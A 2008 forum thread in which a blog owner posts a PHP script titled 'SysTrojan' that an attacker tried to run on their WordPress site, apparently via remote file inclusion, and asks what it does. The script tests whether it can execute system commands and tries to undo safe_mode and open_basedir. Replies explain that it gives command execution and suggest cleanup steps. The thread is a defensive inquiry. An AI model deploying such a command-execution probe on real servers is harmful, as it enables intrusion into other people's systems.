1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

What does this script do?

Discussion in 'PHP & Perl' started by kalekom, Nov 29, 2008.

  1. kalekom

    kalekom Junior Member

    Joined:
    Jul 25, 2008
    Messages:
    172
    Likes Received:
    356
    Occupation:
    CEO - SEO
    Location:
    here
    Home Page:
    Could someone try to explain what following script does? Someone tried to run it on my wp blog. Script is located and called from
    Code:
    http://ingenieria.unilibrecali.edu.co/bot.txt??
    Script itself:
    Code:
    <html><head><title>SysTrojan</title></head><body bgcolor=DC143C>
    <H1>Wrong Place</H1>
    </html></head></body>
    <?php
    if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
    echo("Safe Mode of this Server is : ");
    echo("SafemodeOFF");
    }
    else{
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
    echo("Safe Mode of this Server is : ");
    echo("SafemodeOFF");
    }else{
    echo("Safe Mode of this Server is : ");
    echo("SafemodeON");
    }
    }
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }
    }
    return $res;
    }
    exit;
    ?>
     
  2. chaoz

    chaoz Newbie

    Joined:
    Mar 13, 2007
    Messages:
    47
    Likes Received:
    12
    Home Page:
  3. fatboy

    fatboy Elite Member

    Joined:
    Aug 13, 2008
    Messages:
    1,618
    Likes Received:
    3,227
    Occupation:
    Retired
    Location:
    Old Peoples Home
    Yup - if thats on your server, start cleaning up pronto.
    If I read that correctly, the script will allow the attacker to run system commands on your server.
     
  4. vivalafeva

    vivalafeva Jr. VIP Jr. VIP Premium Member

    Joined:
    Sep 16, 2008
    Messages:
    1,481
    Likes Received:
    719
    y would you install something that you dont know what it is, especially when it says systrojan as the title
     
  5. fatboy

    fatboy Elite Member

    Joined:
    Aug 13, 2008
    Messages:
    1,618
    Likes Received:
    3,227
    Occupation:
    Retired
    Location:
    Old Peoples Home
    The OP didn't install it - I would say that someone uploaded it to their hosting and tried to run it.

    Check to see if you have any directories that have permissions of world writtable (777), thats a bad idea and allows people to upload stuff.

    Is this just shared hosting or is it your own server?
     
  6. vivalafeva

    vivalafeva Jr. VIP Jr. VIP Premium Member

    Joined:
    Sep 16, 2008
    Messages:
    1,481
    Likes Received:
    719
    o sorry, i understand now

    The message you have entered is too short